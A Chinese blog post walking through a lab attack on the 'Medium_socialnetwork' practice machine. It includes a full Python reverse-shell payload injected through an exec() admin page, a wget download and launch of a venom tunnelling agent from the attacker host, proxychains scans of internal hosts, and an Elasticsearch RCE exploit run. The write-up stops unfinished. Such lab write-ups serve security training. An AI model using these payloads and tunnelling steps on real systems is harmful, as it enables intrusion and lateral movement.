打靶第一周-Medium_socialnetwork

靶机地址

Medium_socialnetwork

攻击手段

主机发现
端口扫描
服务发现
路径爬取
代码注入
Shell脚本
内网信息收集
内网穿透
漏洞利用
密码破解
本地提权
攻击代码修改

使用工具

nmap 主机发现
dirsearch 目录扫描
nc 端口侦听
venom 内网穿透
proxychains 代理
searchsploit exp查找

开始攻击

  1. 首先ifconfig查看自己ip
    在这里插入图片描述

  2. 扫描网段,发现目标主机。nmap 10.155.211.0/24。可看到开启了22,5000端口。
    在这里插入图片描述

  3. 扫描端口,查看服务。nmap 10.155.211.171 -p22,5000 -sV
    在这里插入图片描述
    访问目标
    在这里插入图片描述

  4. 只有一个输入框,测试xss
    在这里插入图片描述
    可以看到被编码了

  5. 换方向,尝试爆破路径。使用dirsearch
    在这里插入图片描述

  6. 访问http://192.168.168.12:5000/admin
    在这里插入图片描述
    可知所有代码将交给exec()函数执行,且前期发现系统中存在python环境
    可提交反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

参考:反弹shell的几种方式总结
先不提交

在这里插入图片描述

  1. 在kali使用nc启动侦听。nc -nvlp 4444得到shell
    在这里插入图片描述
  2. 看到dockerfile文件,怀疑为docker容器。判断容器

使用ls /.dockerenv查看是否存在dockerenv文件。
使用cat /proc/1/cgroup查看

  1. 查看内网主机,用ping命令扫描内网其他主机
    在这里插入图片描述
    是16位网段,所以需要扫65535个ip。使用for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done命令。(尝试扫描c段for i in $(seq 1 255);for s in $(seq 1 255); do ping -c 1 172.17.$i.$s; done但会报错)原因
    for a in`seq $num`
    在这里插入图片描述
    可看到172.17.0.2;172.17.0.3回包了

  2. 直接访问是不同的,需要使用内网穿透。使用venom工具,建立隧道。
    venom
    下载解压后选择合适的客户端。这里我们选择agent_linux_x64模块可看到有agent模块和admin模块
    在这里插入图片描述
    启用./admin_linux_x64 -lport 9999侦听9999端口
    在这里插入图片描述
    然后将agent_linux_x64传到目标机去。
    我们使用python开启一个http服务。(注意要在所传文件的当前目录创建服务)
    在这里插入图片描述
    然后用目标机访问服务,并下载agent_linux_x64

wget http://192.168.168.13/agent_linux_x64

在这里插入图片描述
之后给与权限

chmod +x agent_linux_x64

在这里插入图片描述
建立隧道

./agent_linux_x64 -rhost 192.168.168.13 -rport 9999

在这里插入图片描述
在这里插入图片描述

  1. 使用venom。
    show命令查看
    goto 1节点
    使用socks 1080,侦听1080端口
    这样在kali上就启动了一个侦听1080端口上的socks代理。
    在这里插入图片描述
  2. 为了让kali的攻击工具就可以通过挂代理访问内网网段。使用proxychain。由第(9)步知内网中有172.17.0.2;172.17.0.3两台机器。
    修改proxychain的配置文件vi /etc/proxychains4.conf在最后参照(11)修改代理类型为socks5 端口改为1080
    在这里插入图片描述
  3. 对内网机器扫描。
    proxychains nmap -Pn -sT 172.17.0.1
    在这里插入图片描述
    可看到开启了22,5000端口。使用proxychains nmap -p22,5000 -Pn -sT -sV 172.17.0.1详细扫描
    在这里插入图片描述
    由此确定172.17.0.1是192.168.168.12的内网 ip。也可尝试使用浏览器访问(需配置代理)
    在这里插入图片描述之后可看到192.168.168.12:5000的网页与172.17.0.1:5000相同。

扫172.17.0.2
proxychains nmap -Pn -sT 172.17.0.2,发现开放了9200端口
在这里插入图片描述
扫服务proxychains nmap -p9200 -Pn -sT -sV 172.17.0.2发现是Elasticsearch应用
在这里插入图片描述

  1. 搜索漏洞。使用searchsploit Elasticsearch搜索漏洞exp
    在这里插入图片描述第一第二个为rce利用脚本可以挨个尝试。

  2. 使用exp。proxychains python2 36337.py 172.17.0.2
    在这里插入图片描述getshell了。
    但发现无法运行是因为Elasticsearch中需要先有数据才能被攻击。
    https://github.com/YrenWu/Elhackstic
    proxychains curl -XPOST ' http://172.17.0.2:9200/twitter/user/yren ' -d ' { "name" : "deng" } '
    在执行exp不报错。

  3. 执行ls命令,发现有一个有趣的东西,密码文件。解密后发现使用john账户可登录

在第15步时,我提交了数据仍然报错,暂时不做了。后续做了在更。

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值